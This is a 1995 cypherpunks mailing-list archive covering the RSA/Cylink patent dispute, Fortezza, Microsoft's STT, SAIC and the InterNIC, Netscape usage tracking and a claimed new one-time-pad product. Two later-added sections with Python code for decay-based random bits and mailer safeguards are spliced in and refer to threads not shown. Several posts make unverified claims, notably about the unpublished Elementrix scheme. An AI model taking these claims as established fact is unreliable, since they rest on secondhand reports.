A. We have filed a Declaratory Relief Action in Federal Court.
In that action, we have essentially said that Cylink is estopped -prevented- from taking action against anyone for infringing the Stanford patents for several reasons. The main reason is that companies who licensed software from RSA Data Security rather than "build their own" software do not need separate licenses to the MIT or Stanford patents. Since Cylink has confirmed this many times since 1990, they should not sue anyone for infringement. Another reason is that the Stanford patents are unenforceable and/or invalid.

This action by RSA means that any suit brought by Cylink against anyone for infringement of the Stanford patents should be stopped until the resolution of the Declaratory Relief action, and Cylink will have to prevail on all the points above before they can assert any infringement.

We have also indemnified our customers against claims such as those implicitly threatened by Cylink. RSA intends to stand behind these indemnity agreements fully. Anyone can bring a lawsuit for just about any reason. If Cylink tries to sue an RSA customer, RSA has both the determination and the resources to defend any such action.

Read the Cylink press release carefully. Cylink huffs and puffs a lot, but is not directly threatening to sue anyone -that would mean they would be forced to fight the virtually impossible battle of prevailing on every point in our Declaratory Relief action- but instead are saying that buying a license can eliminate any risk.

------------------

Q. Has anyone else challenged the Stanford patents?

A. A suit was filed in Federal Court last year by Roger Schlafly to invalidate the Stanford patents. A ruling is due in December. From what we've seen, Schlafly's claims raise disturbing questions about the Stanford patents. This whole business of the Stanford patents may be moot in a few months. There may be no risk - and no need to try to get any money back from Cylink.

------------------

Q. What will be the significance of PKP being dissolved?

A.
The most important change we see is that licenses to the MIT patent will be available for the first time in over five years without Cylink interference. * There is a tremendous amount of pent-up demand, and we are very busy filling it. Many of the largest companies in Europe, Asia, and the US are purchasing licenses to bring RSA-based products to market, including many low-cost chips and smart cards. We have already licensed a number of large and small companies that are bringing RSA-based electronic commerce, access control, and Internet security systems to market; we expect many, many more.

------------------

Q. Why can't RSA and Cylink simply settle their differences?

A. That's a good question. The fact is that RSA recognizes this litigation is not beneficial to anyone and has offered to settle the dispute by granting Cylink a license to the MIT patent. Cylink has consistently overestimated the strength of its legal position and has refused all reasonable offers. Cylink now finds itself in the unenviable position of trying to sell its security products without RSA technology - which is the de facto industry standard. No amount of "spin doctoring" in press releases by Cylink changes that fact.

------------------

* During its existence from April of 1990 until September of this year, PKP could not grant any license without the approval of both partners. As a result of PKP's dissolution, the rights to the Stanford patents were returned to Cylink, and the exclusive right to license the MIT patent (RSA) was returned to RSA Data Security, Inc. Cylink currently has no rights to sell any products incorporating the MIT patented technology.

----------------------------------------------------------------------------

(C) 1995 RSA Data Security, Inc. All rights reserved. Permission granted for unlimited reproduction and distribution unmodified.
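The "Simple Hardware RNG Idea" thread above asks whether a Geiger tube over a radioactive sample would be "random enough". The part the question leaves open is how you turn counts into bits without inheriting the bias of the counter's clock or the source's unknown decay rate. Decay events form a Poisson process, so the gaps between counts are exponentially distributed and memoryless; comparing two consecutive gaps therefore gives a 0 or a 1 with equal probability whatever the rate is, which is the standard extraction method for decay-timing sources. The example below is added here and is not code from the thread; the tube is replaced by a constructed, seeded simulation, and the two health checks are the crude ones a practitioner would bolt on first, not a full statistical test suite:

```python
"""Unbiased bits from a radioactive-decay (Poisson) event source.

Added example for the Simple Hardware RNG thread. The Geiger tube is
simulated (constructed data); the extraction and health checks are the
parts that matter for a real source.
"""
import random
from typing import Iterable, List


def simulate_decay_intervals(n: int, rate_hz: float, seed: int = 1) -> List[float]:
    """Stand-in for a tube: with a Poisson event stream the time between
    consecutive counts is exponentially distributed with mean 1/rate."""
    rng = random.Random(seed)
    return [rng.expovariate(rate_hz) for _ in range(n)]


def bits_from_intervals(intervals: Iterable[float]) -> List[int]:
    """Pair consecutive inter-arrival times (t1, t2): emit 0 if t1 < t2 and
    1 if t1 > t2. The exponential distribution is memoryless, so both
    orderings are equally likely regardless of the source's average rate,
    which removes the bias a raw timer value would carry. Ties (possible
    with a coarse timer or the tube's dead time) are discarded, never guessed.
    Cost: at most one bit per two counts, so the entropy rate is bounded
    by the tube's count rate."""
    out: List[int] = []
    it = iter(intervals)
    for t1, t2 in zip(it, it):
        if t1 < t2:
            out.append(0)
        elif t1 > t2:
            out.append(1)
    return out


def pack_bytes(bits: List[int]) -> bytes:
    """MSB-first packing; a trailing partial byte is dropped."""
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        value = 0
        for b in bits[i:i + 8]:
            value = (value << 1) | b
        out.append(value)
    return bytes(out)


def ones_fraction(bits: List[int]) -> float:
    """Health check 1: a working source sits close to 0.5."""
    return sum(bits) / len(bits) if bits else 0.0


def longest_run(bits: List[int]) -> int:
    """Health check 2: a stuck, saturated or disconnected tube shows up as
    very long runs of identical bits (expect roughly log2(n) for n fair bits)."""
    best = run = 0
    prev = None
    for b in bits:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


if __name__ == "__main__":
    intervals = simulate_decay_intervals(20000, rate_hz=100.0)
    bits = bits_from_intervals(intervals)
    print(len(bits), "bits; ones fraction", round(ones_fraction(bits), 3),
          "; longest run", longest_run(bits))
    print(pack_bytes(bits[:64]).hex())
```

The point a real build should keep from this: the raw interval values (or their parity) must never be used as the output, because their distribution depends on the rate and on the timer's resolution; only the comparison is rate-independent. The health checks are there because a hardware source fails silently, and a source that has stopped producing counts must stop feeding the pool rather than feed it zeros.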
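Travis Corcoran's mail-secure.el messages above describe the safeguards he added to an automated key-query mailer: a list of people who do not want key queries (with one address as the default entry), a disk-based record of addresses already asked, a check against both lists before any mail goes out, and a human prompt in the loop. Those are the controls that make the "great care must be taken in running automated mail-response programs" point concrete, so here they are as a small worked example. This is added code, not mail-secure.el (which is Emacs Lisp); the class name, JSON state file, the placeholder opt-out address and the `.invalid` sample addresses are all constructed for illustration:

```python
"""Guard rails for an automated key-query mailer.

Added example for the mail-secure.el discussion. Constructed illustration,
not the package's own code: class, state-file format and addresses are
assumptions made for this example.
"""
import json
import os
import tempfile
from typing import Callable, Iterable, List, Optional, Set

# Placeholder for the addresses that have asked never to receive key queries
# (the page says the package ships one real address as the default entry).
DEFAULT_NO_QUERY = frozenset({"no-key-queries@example.invalid"})


class KeyQueryGate:
    """Decides whether a failed signature check may trigger a key request."""

    def __init__(self, state_path: str, no_query: Iterable[str] = DEFAULT_NO_QUERY,
                 confirm: Optional[Callable[[str], bool]] = None) -> None:
        self.state_path = state_path
        self.no_query: Set[str] = {a.lower() for a in no_query}
        # Human in the loop: the interactive prompt is a callback here so the
        # decision logic can be exercised without a terminal.
        self.confirm = confirm or (lambda addr: True)
        self.already_asked: Set[str] = self._load()

    def _load(self) -> Set[str]:
        if not os.path.exists(self.state_path):
            return set()
        with open(self.state_path) as fh:
            return set(json.load(fh))

    def _save(self) -> None:
        with open(self.state_path, "w") as fh:
            json.dump(sorted(self.already_asked), fh)

    def decide(self, sender: str, key_in_local_ring: bool, key_on_keyserver: bool) -> str:
        """Return the action for a signed message whose key could not be found.
        A query is the last resort, after the local ring and the keyserver."""
        if key_in_local_ring or key_on_keyserver:
            return "have-key"
        addr = sender.lower()
        if addr in self.no_query:
            return "suppressed"       # hard error in the original package
        if addr in self.already_asked:
            return "already-asked"    # never ask the same person twice
        if not self.confirm(addr):
            return "declined"         # the human said no
        # Record before sending so an interrupted send cannot cause a repeat.
        self.already_asked.add(addr)
        self._save()
        return "send"


def demo() -> List[str]:
    """Constructed scenario; returns the sequence of decisions."""
    path = os.path.join(tempfile.mkdtemp(), "key-queries.json")
    gate = KeyQueryGate(path, confirm=lambda a: not a.startswith("noreply"))
    log = [
        gate.decide("alice@example.invalid", False, False),   # first miss: ask once
        gate.decide("Alice@example.invalid", False, False),   # same address, case-folded
        gate.decide("no-key-queries@example.invalid", False, False),  # opted out
        gate.decide("bob@example.invalid", True, False),      # key already held
        gate.decide("noreply@example.invalid", False, False), # human declined
    ]
    # A fresh instance re-reads the disk file, so a restart does not re-query alice.
    log.append(KeyQueryGate(path).decide("alice@example.invalid", False, False))
    return log


if __name__ == "__main__":
    print(demo())
```

Two design choices worth copying into any auto-responder: the "already asked" set is written to disk before the message is sent, so a crash between the two steps errs on the side of silence, and addresses are case-folded before every lookup so a differently capitalised copy of the same address cannot slip past either list.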
From dl at hplyot.obspm.fr Thu Sep 28 12:37:29 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Thu, 28 Sep 95 12:37:29 PDT Subject: Anon Http web Proxy V2.1 Message-ID: <9509281922.AA18715@hplyot.obspm.fr> I fixed the IOs, it now works a lot faster, play with it on http://hplyot.obspm.fr:6661/ (no abuse plz) and get the source package on ftp://hplyot.obspm.fr/tcl/www/tclhttpdsh-0.4beta.tgz dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept smuggle FSF terrorist $400 million in gold nuclear Serbian Clinton From karn at qualcomm.com Thu Sep 28 13:17:47 1995 From: karn at qualcomm.com (Phil Karn) Date: Thu, 28 Sep 95 13:17:47 PDT Subject: Using sound cards to accelerate RSA? Message-ID: <199509282017.NAA20380@servo.qualcomm.com> >Somebody mentioned the possibility of using the a/d stage of a sound card >as a source of random bits, and that brought a thought back to mind: >given that a lot of sound cards are now shipping with DSP chips on board, >has anyone written any code that uses the cards DSP to accelerate RSA >processing? But most sound cards still don't have DSP chips. And modern general purpose CPUs are beginning to give them such a good run for their money that I wonder whether DSPs will ever become widespread. I'd stick with running RSA on the main CPU for now. Phil From asgaard at sos.sll.se Thu Sep 28 13:17:48 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Thu, 28 Sep 95 13:17:48 PDT Subject: "Notes" to be Eclipsed by "Netscape" In-Reply-To: <01BA8CD0.30988CA0@ploshin.tiac.net> Message-ID: Pete Loshin wrote: > >Timothy C. May wrote: > >(I've been saying for a while that the Web serves that purpose better, and > >that Web browsers will likely edge out Notes. Apparently I was hardly > >prescient, as Netscape recently bought Collabra, which is pushing that > >point exactly.) 
> > Notes uses replication to distribute data across networks; > there are better ways to have people compute remotely in my opinion > too (not sure WWW is THE answer, but it certainly is one of them). In an interview today in a Stockholm paper with a technical spokesperson for Hewlett-Packard (about the HP internal net with 19 worldwide connections to the Internet - by the way, allegedly no one has ever succeeded in breaking their firewalls) it was stated that Netscape was heavily used for HP internal business. Apparently there was a choice between Notes and the internal Web, the Web being favoured 470:1. Mats From jcaldwel at iquest.net Thu Sep 28 13:35:32 1995 From: jcaldwel at iquest.net (James Caldwell) Date: Thu, 28 Sep 95 13:35:32 PDT Subject: STT_??? Message-ID: On 28 Sep 95 at 8:08, John Young wrote: > 9-28-95. W$Japer: > > > "Infighting Unravels Alliance Seeking Standard to Protect > Internet Purchases." Money, money, money, MONEY! Let's hope Digital cash sans the Corprats takes... > The consortium brought together such top players as > credit-card rivals Visa International and MasterCard > International Inc., software titan Microsoft Corp. and > Internet upstart Netscape Communications Corp. But this > week, the alliance split because of tensions between > Visa and MasterCard and their respective technology > partners -- Microsoft and Netscape. Watch the vultures at Microsoft come to feed: > Regarding Netscape, Mr. Dent of Microsoft said the > firm's security deficiencies that have recently come to > light have "tainted" electronic commerce on the > Internet. Mr. Dent also noted that Microsoft yesterday > introduced new security technology, including means to > verify a user's identity, that is much stronger than > Netscape's. From mab at crypto.com Thu Sep 28 13:44:09 1995 From: mab at crypto.com (Matt Blaze) Date: Thu, 28 Sep 95 13:44:09 PDT Subject: Netscape & Fortezza (Or, say it Ain't so, Jeff?)
In-Reply-To: <199509281309.JAA12017@bwh.harvard.edu> Message-ID: <199509282054.QAA26219@crypto.com> >This came across the SSL mailing list. Anyone know Taher's position >on key-escrow? Oh, come on. One does not have to "support key escrow" to be interested in Fortezza. The Fortezza interface does not have any "escrow-specific" features; it's actually a pretty good crypto API (for which several vendors plan to produce compliant, non-escrowed PCMCIA cards). The Fortezza market (in the government) is also pretty big, by the way, so one can hardly blame any vendor for being interested in it. Disclaimer: I'm also an evil "Fortezza sympathizer". I built a (Tessera, actually) version of CFS last year. I think it's a good interface, and I'd encourage people to build strong, non-escrowed crypto modules (in hardware and in software) that conform to it... -matt From dvw at hamachi.epr.com Thu Sep 28 13:51:15 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Thu, 28 Sep 95 13:51:15 PDT Subject: More on "Entropy" Message-ID: <306B0A5E@hamachi> Tom Weinstein wrote: >We used this formulation of entropy in Statistical Mechanics. It's >especially useful in Quantum Thermo where you can actually enumerate all >of the states instead of relying on probabilistic arguments. Sure, this formulation can be used. As a pedagogic tool for explaining what a theory is all about, many formulations are discussed as if they have application in real world situations. Of course (for pedagogic reasons), these discussions focus on systems in which there is a definition, and typically a well-behaved mathematical model, for all of the significant states. Some instructors believe this will assist students in appreciating the concepts of statistical mechanics and quantum thermodynamics. To build a working apparatus (or software systems, as we are discussing here), the designer is typically faced with the breakdown of well-behaved mathematical models.
Everything from degenerate states to the "baked in" uncertainty of certain states tends to undermine the mathematical foundations of a theorist's constructions. Of course the theoretical models are absolutely critical, but the designer must always caution themselves against drawing inferences without measurements and clearly stated rationales that speak to these physical realities that lead to mathematical weaknesses. Ultimately, the probabilistic nature of such systems may be "moved around," but not removed from the model! Since the real world of actual measurements interferes with essentially everything we claim to "know" about quantities such as entropy, the real danger is assigning an independent "meaning" to these constructs. Why? Because these quantities do not exist independently, they only exist with respect to our predictive models of a system's behavior. So these models do not really "enumerate" anything about states, but rather restate the probability assumptions of the model in the form of a "working equation." In addition, drawing inferences as to the behavior of systems based on common mathematical form is simply inviting trouble, even at the theoretical level. Mathematical models are not the real world, and the superficial mathematical consistency between say, the functional form of a resonance in a quantum well and a marble in a bowl, does not mean that the marble gives any special insight into the nature of the quantum well. In fact, beyond the curiosity of similar equations, the most important information is in the distinctions and clarifications (emanating from theory) between the systems from a practical, apparatus building, real world perspective (as contrasted with the "everything is just a special case of X" perspective). This danger is also present in designs for sources of entropy to seed RNGs for random data or to create uniformly distributed keys. 
Well designed models will avoid rephrasing assumptions as conclusions, and will explicitly address the mathematical weaknesses upon which the theoretical arguments in support of the model are ultimately based. dvw From lethin at ai.mit.edu Thu Sep 28 14:57:39 1995 From: lethin at ai.mit.edu (Rich Lethin) Date: Thu, 28 Sep 95 14:57:39 PDT Subject: NPR reports on Digital Express Secure Telephone Message-ID: <199509282157.RAA23858@grape-nuts.ai.mit.edu> Digital Express coverage on NPR. Seastrom and Shiller(sp?) talking over a powerbook using PGPPhone. Demonstrating secure telephones! Edward Appel, director of counterintelligence FBI representative on National Security Council is quoted. "It's very easy for a criminal or a terrorist or a spy to use this for their advantage." Reporter "You can connect to an MIT computer and get pgp-phone, you have MIT Press 900 page book from PGP! "You can carry that book with you, anywhere you want in the world... Export control laws don't cover books..." Hal Abelson, MIT advisor to MIT press, etc, etc, ... Appel "It's clearly not some weird form of poetry. It is source code, it is a program, ... if you can use it to tell the computer what to do then it is part of the machine itself..." The authors of PGP say "The real threat is that this technology is not distributed widely enough..." From mattt at microsoft.com Thu Sep 28 15:03:52 1995 From: mattt at microsoft.com (Matt Thomlinson) Date: Thu, 28 Sep 95 15:03:52 PDT Subject: 2^25 Crays a Year to Break STT Message-ID: <9509282305.AA09854@netmail2.microsoft.com> don't you love how the media gets the story straight? ---------- From: Bill Stewart To: Subject: Re: 25 Crays a Year to Break STT Date: Thursday, September 28, 1995 10:33AM > Microsoft said its Secure Transaction Technology (STT), was > designed to provide a much higher level of security for > credit card transactions on the Internet.
Netscape's > general purpose encryption system uses a 40 or 128-bit > electronic "key", while STT will use 2,000-bit keys. Sigh. Apples and oranges, and they know it. ..... > Although no encryption system was totally secure, Mr Dent > estimated it would take "25 Cray supercomputers a year" to > break the STT codes. So how much work can 25 Crays do in a year? Crack single-DES? Maybe RC4/64? #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From andrew_loewenstern at il.us.swissbank.com Thu Sep 28 15:26:57 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Thu, 28 Sep 95 15:26:57 PDT Subject: awards for hacking microsoft Message-ID: <9509282225.AA04018@ch1d157nwk> > What else, Chaum's Digicash. If you are unwilling to part with > any of your own, perhaps you can collect contributions, or maybe > the Digicash people will pony-up some extra cyberbucks for a good > cause. After all, they are worth the paper they're printed on. > :-) Don't tell that to the people on the ECM mailing list! People there have been trading cyberbucks for RealMoney. The last successful trade I saw was 100 cyberbucks for 4 UK pounds... andrew From frederic at none.net Thu Sep 28 15:41:47 1995 From: frederic at none.net (Frederic Miserey) Date: Thu, 28 Sep 95 15:41:47 PDT Subject: 25 Crays a Year to Break STT Message-ID: <9509282340.AA44771@margote.none.net> > to encourage widespread adoption of STT, Microsoft and Visa are making > its technical specifications available at no charge to third parties > to allow them to develop software. > I can't find any info on www.microsoft.com. Any hint on how to get these specs?
Frederic --------------------------------------------------------------------------- Frederic Miserey mailto:frederic at none.com none programs finger me for PGP key 42 3A 75 40 71 E6 DC 3B 50 90 F9 6B 26 28 60 91 "The last bug isn't fixed until the last user is dead" - Sidney Markowitz From jsw at neon.netscape.com Thu Sep 28 15:58:07 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Thu, 28 Sep 95 15:58:07 PDT Subject: Netscape & Fortezza (Or, say it Ain't so, Jeff?) In-Reply-To: <199509281309.JAA12017@bwh.harvard.edu> Message-ID: <44f98a$mu5@tera.mcom.com> In article <199509281309.JAA12017 at bwh.harvard.edu>, adam at bwh.harvard.edu (Adam Shostack) writes: > This came across the SSL mailing list. Anyone know Taher's position > on key-escrow? Just because we may do fortezza support for customers who want it does not mean that we will force key escrow on the rest of the world. I for one am against any kind of GAK on moral grounds. I also think that trying to implement mandatory GAK in a software only system would be a nightmare. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From hallam at w3.org Thu Sep 28 16:26:20 1995 From: hallam at w3.org (hallam at w3.org) Date: Thu, 28 Sep 95 16:26:20 PDT Subject: VISA and Microsoft STT Specs available Message-ID: <9509282326.AA25864@zorch.w3.org> Hi, The specs for STT are now available. Due to various circumstances too complex to explain these are currently being served via the W3C web server at :- http://www.w3.org/hypertext/WWW/Payments/STT.html This does not constitute an endorsement of these specifications by W3C nor any representation of the fitness thereof. Note that these documents may well move in the future. For more payments related info see:- http://www.w3.org/hypertext/WWW/Payments/ The roadmap has been updated appropriately.
Phill Hallam-Baker From anonymous at robo.remailer Thu Sep 28 17:09:31 1995 From: anonymous at robo.remailer (anonymous at robo.remailer) Date: Thu, 28 Sep 95 17:09:31 PDT Subject: "Notes" to be Eclipsed by "Netscape" In-Reply-To: Message-ID: <199509290004.RAA28740@infinity.c2.org> > > In an interview today in a Stockholm paper with a technical spokes- > person for Hewlett-Packard (about the HP internal net with 19 > worldwide connections to the Internet - by the way, allegedly > no one has ever succeeded in breaking their firewalls) it was "allegedly". Well I suppose you don't need to break the HP firewall to get past it, so I guess that could be an appropriate statement. (I adminned a few of their firewalls for a short time on contract while the person who was normally in charge of them was away. Calling it a firewall is a stretch of the word-- They allow telnets from sites at berkeley.edu and stanford.edu with reusable passwords, for one example.) From gnu at toad.com Thu Sep 28 17:19:04 1995 From: gnu at toad.com (John Gilmore) Date: Thu, 28 Sep 95 17:19:04 PDT Subject: SAIC bought InterNic, but who is SAIC? A spook contractor! Message-ID: <9509290018.AA08111@toad.com> Forwarded-by: gordoni at base.com (Gordon Irlam) Thought you might find this interesting. I don't know if you have thought about it or not, but control over the root name service plus some funky software is all that it takes to be able to selectively snoop on all the packets addressed to any host on the net. DNS is currently the achilles heel of a secure internet... gordoni From: Wes Thomas The press recently reported that the National Science Foundation has turned over Internet Domain Name registration to Network Solutions, Inc. (NSI) of Herndon, VA. The press failed to note some interesting connections. Tomorrow morning (Sept. 
26), Web Review, a biweekly online magazine (see Special Report at http://gnn.com/wr/) will reveal that NSI was purchased in May by Scientific Applications International Corporation (SAIC) of San Diego. SAIC is a $2 billion company indicted by the Justice Department on ten felony counts for fraud in managing a Superfund toxic cleanup site (SAIC pleaded guilty) and sued by the Justice Department for civil fraud on an F-15 fighter contract. SAIC's board members include Admiral Bobby Inman, former NSA head and deputy director of the CIA; Melvin Laird, Nixon's defense secretary; and retired General Max Thurman, commander of the Panama Invasion. Recently departed board members include Robert Gates, former CIA director; William Perry, current Secretary of Defense; and John Deutch, the current CIA director. Current SAIC government contracts include re-engineering information systems at the Pentagon, automation of the FBI's computerized fingerprint identification system, and building a national criminal history information system. "At the very time the Internet community is struggling with the issues of encryption and privacy, I'm more than a little uneasy to find this bunch of ex-spooks sitting at the very entry point of the Net," says Jim Warren (a leading activist in making government records accessible) in the article, which was written by investigative journalist Stephen Pizzo, Web Review Senior Editor and co-author of the book Inside Job, an expose on the savings & loan looting. Web Review is produced by Songline Studios, an affiliate of O'Reilly & Associates. From csmyth at blaze.cs.jhu.edu Thu Sep 28 17:27:07 1995 From: csmyth at blaze.cs.jhu.edu (Chris Smyth) Date: Thu, 28 Sep 95 17:27:07 PDT Subject: Netscape and privacy Message-ID: <9509290026.AA08282@toad.com> The Communications Week issue of September 25 1995 contains an interesting interview with Netscape Chairman Jim Clark in which he outlines the future that he envisions for his company. 
The interview also contains a passage discussing the Netscape browser software that I find somewhat disturbing. Many cypherpunk list members are concerned with the general issue of electronic privacy and with the programming of WWW browsers, so I think this post is relevant to the list. Clark's apparent attitude toward privacy makes me uneasy. Begin excerpt Comm Week: How do you track usage? Clark: We have worked out schemes to tell us when you use our program and for how long you use it. That capability is easy to add. We can tell each and every time you turn it on and we can tell whether you have paid for it or not. We were getting 10 million hits a day at our Web site. It has doubled since our IPO. End excerpt I personally oppose the collection of this type of behavioral tracking information without my explicit consent, and I would reconsider using software which implements the type of tracking Clark mentions above. Note, Clark's reply is ambiguous because it does not indicate if the `schemes' have been implemented or deployed at this time. Some list member associated with Netscape may wish to clarify Clark's comments. It is true that a user automatically contacts the Netscape Web site when starting the browser if he or she has not reset the default home page. I reset my home page long ago, but I do not know if the Netscape site is still contacted anyway. Nor do I know if Netscape is contacted when I quit the browser, or if elapsed usage time is tracked. The future Clark posits for his corporation depends on people adopting Netscape software for a wide variety of tasks. He wants the browser to evolve toward being a general multimedia web browser, mail handler, newsreader, and collaboration tool. Such a tool would handle large amounts of private and/or proprietary information and the creator of such a tool must be extremely sensitive to privacy concerns in my opinion.
Collecting and relaying information about usage is potentially a significant violation of the privacy users will expect. Certainly, it is tempting to gather information for marketing purposes and other reasons. For example, some browser company unconcerned about privacy might program its browser to regularly transmit information about bookmarks and histories to a database site for analysis and data-mining. But ignoring privacy concerns risks invoking the fervent ill-will of many users. Perhaps I am over-reacting to Clark's comments. Even if I am over-reacting, Netscape should consider developing a statement of its privacy policy and making it available at its web site. It is not easy to craft clear, concise and general privacy guidelines. Below are two crudely crafted suggestions for properties that should be satisfied by a browser. 1) Information about browser usage will never be collected and/or transmitted surreptitiously to any other agent on the net. 2) Transfer of information should be done openly with the explicit initiation/agreement of the browser user. Note, currently the Netscape browser (and other browsers) apparently transmit identification information such as the browser type, version number, and machine name when making a connection. The browser user should probably be told about this information in my opinion. Chris Smyth csmyth at blaze.cs.jhu.edu From Doug.Hughes at Eng.Auburn.EDU Thu Sep 28 17:31:18 1995 From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes) Date: Thu, 28 Sep 95 17:31:18 PDT Subject: worldwide announce: New OTP Mail/FTP apps Message-ID: <199509290031.TAA24720@lab21.eng.auburn.edu> A company in Israel named Elementrix has just announced at Interop an entirely new paradigm in secure transactions. They have a secure one time pad that allows people to exchange mail and ftp files back and forth in complete security without the worries of key management or storage or secure random number generation or synchronization.
In the words of Winn Schwartau: "This really fucks with your brain" Both he and David Kahn have gotten information out of non-disclosure, as well as several other un-named experts in cryptography about the nature of this new development. They were astounded and have provided assurances as to its authenticity and ability to work as advertised. So far they have not released the complete protocol, but plan to do so as soon as the Patent issues pending in several countries have been resolved. The protocol will be completely published and subject to scrutiny by everybody. To me it looks like it would be trivial for them to integrate it into any and all kinds of browsers, clients and applications. Of course, I do not have a complete knowledge of the entire protocol, but the brief overview was simple enough to understand in concept. If it can work in FTP, it can surely work in telnet as well, it's just a different front end over a TCP/IP connection. I realize that there will be those out there on this list who will immediately dismiss this as a hoax, as would have I had I not seen it operate with my own eyes, and sat through the conference. It was a case of serendipity for me, showing up at the booth and getting an invite to the press conference on the one day I decided to attend Networld/Interop. It works something like this: (I may not have it completely right, but this is what I understood of the broken English of the man without the microphone) A third party generates random numbers, or one of the two communicating parties. The numbers do not have to be secret. There is also a published table of mappings.. Something like, a number, and an operation.. 1 -> add 23 2 -> add 21 3 -> add 40 4 -> add 57 90 -> sub 23 One initial connection is all that is needed to have a secure connection for the lifetime of the two communicating parties. This initial connection can be accomplished via any number of ways. It does involve an initial one time only shared secret.
This is much different than the many shared secrets and key management issues of private and public key systems. For the initial connection you can stick the machines back to back if you are really worried about security. This initial transaction serves as a seed for subsequent transactions. All subsequent transactions depend on preceding transactions. A degree of randomness comes from the randomness of the messages. Each next word in the message is random. (the argument goes like this: If you already know what the next word in the message is, there is no point in sending the message in the first place, because you know what all the words in the message are.) This imparts some degree of randomness, as no two beings will have an entire conversation over their lives the same as their conversation with anybody else: similar arguments can be applied to file transfers. After the initial exchange every message sent subsequently gets randomized from the previous randomness of the messages plus something in the table. If somebody else makes an exact copy of your machine, and sends a message as you, then you can no longer send messages to the other party as you are out of sync, and an Intruder alert is flagged if you do try to send a message. Then you and the foreign party can resynchronize. This new state is the basis for new messages. Argument: "That's fine, but how do I communicate securely with someone over the Internet with email that I'm not able to setup a secure channel with." Apparently each distribution disk is encoded with a unique ID and some kind of unique (and as yet undisclosed table and algorithm). This table allows the two parties to somehow setup a secure session and send mail. This does not solve authentication problems. If somebody steals your disk and sends mail to someone, they can appear to be you (or anybody).
However, the minute you try to send mail to that same person, there is state on the remote machine with the imposter that you do not possess that flags an intruder problem, and new negotiations can begin. However, snoopers of the original message will still be unable to decode the one time pad. Winn Schwartau and Dr. David Kahn have both signed non-disclosure and both made announcements to the effect that it does work as advertised. Also, it is not strictly random numbers in the traditional sense. It relies on the fact that the message is composed of a random series of words to create the one time pad. However, the one time pad does not repeat itself due to the continuing diversity of subsequent messages. They have reviewed the math and the algorithms and stated that it's a completely new way to think about cryptography, and the math is valid. Usability: point and click.. Click on the little lock button and the message is encrypted on the fly. The mail browser decrypts the message on the fly. After it is decrypted it is stored on the hard drive in plain text. (As it would have to be, unless you encrypt it with some conventional secret-key algorithm like DES or IDEA). This is fine as they say you have to have some degree of physical security anyway, and this is only to protect you on the networks in between the two machines. I'm inclined to agree. Notes: It's fast!! I'm just telling you what I heard. I have no idea how or what is stored as state information if anything. (part of the currently undisclosed algorithm). I was very skeptical at first, but have affected cautious optimism at this point. (until it is published). I just have a couple things to add. If it's true and works as advertised, we're in for a real treat, and the NSA and FBI are going to be really upset. :) Those drug smugglers and kiddie porn pushers are going to be immune to network wire taps. Next step: illegal algorithms, illegal XOR.
;) From cman at communities.com Thu Sep 28 17:51:04 1995 From: cman at communities.com (Douglas Barnes) Date: Thu, 28 Sep 95 17:51:04 PDT Subject: Crypto hardware (was: Using sound cards to accelerate RSA?) Message-ID: [Tim May writes about why crypto h/w acceleration using DSPs, and DSPs in general, are likely doomed niche markets.] I pretty much agree with Tim, except it's important to realize that for a _server_ that is doing a lot of RSA operations, the difference between a 3.2 second encryption and a 1.9 second encryption is significant. Peak transaction volume for any public key-based payment system is going to be a factor of how many RSA ops you can do per second. It seems clear though that what's desired for this scenario is good, dedicated hardware based on ASICs. I've been trying to buy a sample board from Uti-Maco in Belgium, which looks ideal for this sort of thing, but have finally given up in the face of communications problems, their fear of RSA Labs, new Belgian export controls they haven't tried to work with yet, and their belief that I need a US crypto import license, which I can't persuade anyone to admit _exists_. Anyhow, for personal use, the only dedicated hardware we're likely to see will not be focused on speed, but rather on security. Stuff like the various PCMCIA cards from Nat Semi and Telequip, the "decoder rings" and "decoder keychain do-dads" and so forth that have security and convenience benefits. From cjs at netcom.com Thu Sep 28 17:57:57 1995 From: cjs at netcom.com (Christopher J. Shaulis) Date: Thu, 28 Sep 95 17:57:57 PDT Subject: worldwide announce: New OTP Mail/FTP apps In-Reply-To: <199509290031.TAA24720@lab21.eng.auburn.edu> Message-ID: <199509282349.TAA00187@hoopsnake.cjs.net> > One initial connection is all that is needed to have a secure > connection for the lifetime of the two communicating parties. This > initial connection can be accomplished via any number of ways.
It > does involve an initial one time only shared secret. This is much > different than the many shared secrets and key management issues of > private and public key systems. For the initial connection you can > stick the machines back to back if you are really worried about > security. This initial transaction serves as a seed for subsequent > transactions. All subsequent transactions depend on preceding > transactions. A degree of randomness comes from the randomness of > the messages. Each next word in the message is random. I'm a little new to this, but I thought the whole idea behind keys was not having to whisper "secrets" to someone on the other side of a crowded mall. Most people don't have the luxury of connecting their computers back to back with someone on the other side of the world just to ensure a secure communications path. There would have to be some mechanisms to ensure the secure delivery of your "secret", and that brings us back to key management, so the whole thing is rather self-defeating. Christopher From anon-remailer at utopia.hacktic.nl Thu Sep 28 18:10:21 1995 From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request) Date: Thu, 28 Sep 95 18:10:21 PDT Subject: Q&A on the RSA/Cylink legal dispute In-Reply-To: <9508288123.AA812314973@snail.rsa.com> Message-ID: <199509290110.CAA23301@utopia.hacktic.nl> baldwin , Robert W. Baldwin wrote: >Q. Why can't RSA and Cylink simply settle their differences? > > A. That's a good question. The fact is that RSA recognizes this > litigation is not beneficial to anyone and has offered to settle the > dispute by granting Cylink a license to the MIT patent. Real Answer: Because they're all a bunch of crooks. PKP was formed for the purpose of monopolizing the market and screwing the customers. Unfortunately, RSA and Cylink were too busy trying to screw each other that they forgot what their real mission was.
